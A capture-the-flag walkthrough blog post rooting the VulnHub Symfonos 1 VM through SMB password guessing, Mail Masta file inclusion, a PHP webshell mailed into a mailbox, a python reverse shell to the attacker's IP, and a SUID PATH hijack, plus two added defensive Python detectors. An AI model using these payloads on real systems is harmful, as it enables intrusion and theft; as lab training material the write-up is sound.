I hope to learn together with everyone here; if there are errors in the article, please point them out. Thanks!
Personal blog: CH4SER的个人BLOG – Welcome To Ch4sers Blog
Symfonos VM download: https://www.vulnhub.com/entry/symfonos-1,322/
0x01 Information Gathering
An Nmap scan of the target host shows ports 22, 25, 80, 139 and 445 open, running ssh, smtp, http and smb respectively.

┌──(root㉿ch4ser)-[~]
└─# nmap -p- -sV -sC -A 192.168.196.141
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-17 08:15 CST
Nmap scan report for 192.168.196.141
Host is up (0.00034s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonNamesymfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after: 2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:AA:38:6B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Running DirSearch against the port 80 web root turned up nothing of value.

Since the target exposes smb, I tried smbclient and successfully listed the shares on the target host.
Sharename is the name of each share: print$ is the printer driver share, helios is user helios's personal share, anonymous is the anonymous share, and IPC$ is the IPC service share.
┌──(root㉿ch4ser)-[~]
└─# smbclient -L 192.168.196.141
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        helios          Disk      Helios personal share
        anonymous       Disk
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SYMFONOS

Try the anonymous share first, since anonymous shares usually require no authentication.
It contains attention.txt. Downloading and reading it: Zeus tells staff to stop using the passwords epidioko, qwerty and baseball, and the next person caught using one will be fired. So Zeus is apparently the boss, haha.
┌──(root㉿ch4ser)-[~]
└─# smbclient //192.168.196.141/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 29 09:14:49 2019
  ..                                  D        0  Sat Jun 29 09:12:15 2019
  attention.txt                       N      154  Sat Jun 29 09:14:49 2019

                19994224 blocks of size 1024. 17305336 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (75.2 KiloBytes/sec) (average 75.2 KiloBytes/sec)
smb: \> exit

┌──(root㉿ch4ser)-[~]
└─# cat attention.txt
Can users please stop using passwords like epidioko, qwerty and baseball! Next person I find using one of these passwords will be fired!

-Zeus

Next, connect to helios's personal share with the username helios and try the three passwords epidioko, qwerty and baseball; qwerty turns out to be the correct one.
todo.txt shows that this user is working on /h3l105, so /h3l105 is probably a directory on the website.
┌──(root㉿ch4ser)-[~]
└─# smbclient //192.168.196.141/helios -U helios
Password for [WORKGROUP\helios]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 29 08:32:05 2019
  ..                                  D        0  Sat Jun 29 08:37:04 2019
  research.txt                        A      432  Sat Jun 29 08:32:05 2019
  todo.txt                            A       52  Sat Jun 29 08:32:05 2019

                19994224 blocks of size 1024. 17305336 blocks available
smb: \> get research.txt
getting file \research.txt of size 432 as research.txt (210.9 KiloBytes/sec) (average 210.9 KiloBytes/sec)
smb: \> get todo.txt
getting file \todo.txt of size 52 as todo.txt (25.4 KiloBytes/sec) (average 118.2 KiloBytes/sec)
smb: \> exit

┌──(root㉿ch4ser)-[~]
└─# cat research.txt
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.

┌──(root㉿ch4ser)-[~]
└─# cat todo.txt
1. Binge watch Dexter
2. Dance
3. Work on /h3l105

Visiting /h3l105 reveals a WordPress site; Wappalyzer reports WordPress version 5.2.2.

0x02 Gaining Access - WordPress Arbitrary File Inclusion
Scanning the WordPress site with wpscan shows the mail-masta plugin at version 1.0, which may have an exploitable vulnerability.
wpscan project page: https://github.com/wpscanteam/wpscan
┌──(root㉿ch4ser)-[~]
└─# wpscan --url http://192.168.196.141/h3l105/ --plugins-detection aggressive
............
[+] mail-masta
 | Location: http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 | Readme: http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/, status: 200
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/readme.txt

Searching searchsploit for mail-masta and reading the entry gives the PoC:
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
On this target the path becomes:
/h3l105//wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
┌──(root㉿ch4ser)-[~]
└─# searchsploit masta
-------------------------------------------------------------- ---------------------------------
 Exploit Title                                                |  Path
-------------------------------------------------------------- ---------------------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion        | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)    | php/webapps/50226.py
WordPress Plugin Mail Masta 1.0 - SQL Injection               | php/webapps/41438.txt
-------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root㉿ch4ser)-[~]
└─# find / -name 40290.txt
/root/40290.txt
/usr/share/exploitdb/exploits/php/webapps/40290.txt

┌──(root㉿ch4ser)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/40290.txt
[+] Date: [23-8-2016]
[+] Autor Guillermo Garcia Marcos
[+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip
[+] Title: Mail Masta WP Local File Inclusion
[+] info: Local File Inclusion

The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a dynamic file inclusion mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);

Source: /inc/lists/csvexport.php:
Line 5: include($_GET['pl']);

Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);

Source: /inc/lists/csvexport.php
Line 5: include($_GET['pl']);

Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);

This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.

Typical proof-of-concept would be to load passwd file:
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
The page returns the file contents, which confirms an arbitrary file inclusion here. The next step is to include a webshell. Since no upload point was found, the usual approach is log inclusion: request a path that carries a one-line webshell so it gets written to the log, then include the log file.
I did not take that route here. Recon showed the target runs an smtp service, so the idea was to send user helios an email and then include that user's default mailbox at /var/mail/helios.
┌──(root㉿ch4ser)-[~]
└─# telnet 192.168.196.141 25
Trying 192.168.196.141...
Connected to 192.168.196.141.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM: Ch4ser
250 2.1.0 Ok
RCPT TO: helios
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['shell']); ?>
.
250 2.0.0 Ok: queued as C4C0840698
QUIT
221 2.0.0 Bye
Connection closed by foreign host.

Visiting the path below shows that the email has been written to the mailbox. The webshell code itself does not appear in the page, which is expected: it means it was executed.
/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios

Now all that is left is a reverse shell to get a session. In my testing a bash reverse shell did not connect back, but a python one did. Online reverse shell generator: https://forum.ywhack.com/shell.php
192.168.196.141/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&shell=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.196.128",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
This gives a shell as the unprivileged user helios.
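As an added defender-side example (not from the original post), here is a small Python checker that scans Apache access log lines for the Mail Masta include pattern used above: `pl=` values that are traversal sequences or absolute paths outside the plugin directory, the /var/mail/ spool trick, and extra parameters riding along as a command channel. The log lines, IPs and timestamps are constructed for the example, not taken from the box.

```python
# Added example: flag Mail Masta-style LFI requests in Apache access logs.
# Endpoints come from the exploit-db entry above; the log lines are constructed.
import re
from urllib.parse import parse_qs, unquote, urlsplit

SAMPLE_LOG = """\
10.0.0.5 - - [17/Mar/2024:08:20:01 +0800] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Mar/2024:08:21:10 +0800] "GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&shell=id HTTP/1.1" 200 300 "-" "curl/8.0"
10.0.0.7 - - [17/Mar/2024:08:22:00 +0800] "GET /h3l105/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 90 "-" "python-requests/2.31"
10.0.0.9 - - [17/Mar/2024:08:23:00 +0800] "GET /h3l105/index.php?p=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache combined log: client IP, timestamp, request line, status code.
REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# Scripts that do include($_GET['pl']) according to exploit-db 40290.
VULN_PATHS = ("/inc/campaign/count_of_send.php", "/inc/lists/csvexport.php")
PLUGIN_DIR = "/wp-content/plugins/mail-masta/"  # the only legitimate include target

def analyse_line(line):
    """Return a list of findings for one log line (empty when benign)."""
    m = REQ_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("url"))
    if not url.path.endswith(VULN_PATHS):
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    for value in params.get("pl", []):
        v = unquote(value)  # parse_qs decoded once; this also catches double encoding
        if "../" in v or (v.startswith("/") and PLUGIN_DIR not in v):
            findings.append(f"lfi pl={v}")
        if v.startswith("/var/mail/"):
            findings.append("mail-spool inclusion (possible SMTP-delivered payload)")
    extra = [k for k in params if k != "pl"]
    if findings and extra:
        findings.append("extra params " + ",".join(extra) + " (possible command channel)")
    return findings

def scan_log(text):
    """Map each offending client IP to the findings raised by its requests."""
    hits = {}
    for line in text.splitlines():
        findings = analyse_line(line)
        if findings:
            ip = REQ_RE.match(line).group("ip")
            hits.setdefault(ip, []).extend(findings)
    return hits
```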
┌──(root㉿ch4ser)-[~]
└─# nc -lvvp 7777
listening on [any] 7777 ...
192.168.196.141: inverse host lookup failed: Unknown host
connect to [192.168.196.128] from (UNKNOWN) [192.168.196.141] 52208
/bin/sh: 0: can't access tty; job control turned off
$ whoami
helios
$ id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

0x03 Privilege Escalation - SUID and the PATH Environment Variable
Searching for SUID files turns up /opt/statuscheck, which may be exploitable, but that depends on whether it runs external commands.
$ python -c 'import pty;pty.spawn("/bin/bash")'
h3l105/wp-content/plugins/mail-masta/inc/campaign$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping

Using strings to get a rough idea of what /opt/statuscheck does shows that it runs a curl command.
h3l105/wp-content/plugins/mail-masta/inc/campaign$ strings /opt/statuscheck
...........
curl -I H
...........
Go to /tmp, create a file named curl that runs /bin/bash, and put /tmp at the front of PATH.
h3l105/wp-content/plugins/mail-masta/inc/campaign$ cd /tmp
helios@symfonos:/tmp$ echo /bin/sh > curl
helios@symfonos:/tmp$ chmod 777 curl
helios@symfonos:/tmp$ export PATH=/tmp:$PATH
helios@symfonos:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Run /opt/statuscheck: because it is SUID root, it executes our curl as root, and our curl in turn runs /bin/bash, so we end up with root and the flag.
helios@symfonos:/tmp$ /opt/statuscheck
# whoami
root
# id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
# cd /root
# ls
proof.txt
# cat proof.txt
Congrats on rooting symfonos:1!

[ASCII-art banner]

Contact me via Twitter @zayotic to give feedback!
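As an added example (not part of the original post), this Python helper does the defender's version of the strings and PATH check from the privilege escalation section: it extracts printable strings from a binary, flags shell commands that call a tool by bare name (the defect that let PATH redirect `curl` to /tmp), and lists PATH entries an unprivileged user could write to. The ELF-like blob and all function names are constructed for this example, not taken from /opt/statuscheck.

```python
# Added example: defender-side check for the SUID + relative-command problem.
# Extracts strings like `strings -n 4`, then flags commands invoked by bare
# name, which a SUID program must never do because the caller controls PATH.
import os
import re
import stat

STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")  # printable ASCII runs, 4+ bytes
# Tools a SUID program should only ever invoke by absolute path.
COMMON_TOOLS = {"curl", "wget", "sh", "bash", "cp", "mv", "rm", "cat", "ls", "id", "nc"}

# Constructed stand-in for a SUID binary: one bare `curl`, one absolute path.
SAMPLE_BLOB = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
               + b"curl -I http://localhost\x00/usr/bin/curl -s\x00Hello, World!\x00")

def extract_strings(blob):
    """Printable ASCII runs of at least four bytes, decoded to str."""
    return [m.group().decode("ascii") for m in STRING_RE.finditer(blob)]

def unqualified_commands(blob):
    """Strings whose first word is a known tool given by bare name (PATH lookup)."""
    hits = []
    for s in extract_strings(blob):
        words = s.split()
        if words and "/" not in words[0] and words[0] in COMMON_TOOLS:
            hits.append(s)
    return hits

def is_suid(path):
    """True when the file carries the set-uid bit."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)

def untrusted_path_dirs(path_env):
    """PATH entries that are relative/missing or group/world writable,
    i.e. places where an unprivileged user could drop a fake `curl`."""
    bad = []
    for d in path_env.split(":"):
        if not d.startswith("/") or not os.path.isdir(d):
            bad.append(d or ".")  # empty entry means current directory
            continue
        if os.stat(d).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            bad.append(d)
    return bad

def audit_binary(path):
    """Bare-name commands found inside a real SUID binary ([] if not SUID)."""
    if not is_suid(path):
        return []
    with open(path, "rb") as fh:
        return unqualified_commands(fh.read())
```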